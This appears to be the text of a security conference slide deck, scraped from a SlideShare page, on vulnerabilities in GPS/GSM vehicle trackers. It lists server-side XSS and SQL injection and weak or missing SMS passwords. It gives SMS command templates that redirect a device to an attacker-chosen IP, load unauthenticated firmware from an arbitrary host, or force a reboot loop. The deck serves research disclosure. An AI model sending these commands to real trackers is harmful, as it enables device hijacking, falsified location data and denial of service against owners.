Where is my car, dude?!Dmitry ChastuhinGleb Cherbov
About       Dmitry chipik        Chastuhin      Yet another security researcher @_chipik
About        Gleb Cherbov • Digital security • Defcon Russia 7812 @cherboff
So what?GSM channel                          Fake BTSGPS                      JammersServer side                          ...
Tracker
Attack. Inf disclosure
Attack. XSS
Attack. SQLinj
PROFIT?All your cars         prisoners         children                     are belong to us…
Too simple…
So what?GSM channel                          Fake BTSGPS                      JammersServer side              OWASP top 90...
GPS ant.      Mic/speakerGPS            GSM/GPRS           SIM   ARMRS-232      Power/peripheral
How to interact with?RS-232    – configuration,            firmware updateSMS       – configuration,            data excha...
SMS configuration require authentication…  …but who use it?
…In numbers                43    11                         22  secure   no password        "123" like login/pass
MiTM                                    setparam 3245 <IP>                                    setparam 3246 <Port>change a...
DEMO
Firmware update through SMS • Just sent SMS:         BOOT <IMEI> <APN setting> <ip:port> <filename>         …and device tr...
DoS through SMS• Just sent SMS:        BOOT <IMEI>        …and device will be reboot in infinity updater         loop
Questions?
Chastukhin, cherbov   where is my car dude
Chastukhin, cherbov   where is my car dude
Upcoming SlideShare
Loading in …5
×

Chastukhin, cherbov where is my car dude

1,707 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,707
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
37
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Chastukhin, cherbov where is my car dude

  1. 1. Where is my car, dude?!Dmitry ChastuhinGleb Cherbov
  2. 2. About Dmitry chipik Chastuhin Yet another security researcher @_chipik
  3. 3. About Gleb Cherbov • Digital security • Defcon Russia 7812 @cherboff
  4. 4. So what?GSM channel Fake BTSGPS JammersServer side ?Device
  5. 5. Tracker
  6. 6. Attack. Inf disclosure
  7. 7. Attack. XSS
  8. 8. Attack. SQLinj
  9. 9. PROFIT?All your cars prisoners children are belong to us…
  10. 10. Too simple…
  11. 11. So what?GSM channel Fake BTSGPS JammersServer side OWASP top 9000Device ?
  12. 12. GPS ant. Mic/speakerGPS GSM/GPRS SIM ARMRS-232 Power/peripheral
  13. 13. How to interact with?RS-232 – configuration, firmware updateSMS – configuration, data exchangeGPRS – data exchange, configuration, firmware updateVoice call – just for voice calling =)
  14. 14. SMS configuration require authentication… …but who use it?
  15. 15. …In numbers 43 11 22 secure no password "123" like login/pass
  16. 16. MiTM setparam 3245 <IP> setparam 3246 <Port>change any sent parameter: • coordinates • speed • fuel level
  17. 17. DEMO
  18. 18. Firmware update through SMS • Just sent SMS: BOOT <IMEI> <APN setting> <ip:port> <filename> …and device try to load ip:portfilename and update own firmwareWithout any authentication!
  19. 19. DoS through SMS• Just sent SMS: BOOT <IMEI> …and device will be reboot in infinity updater loop
  20. 20. Questions?

×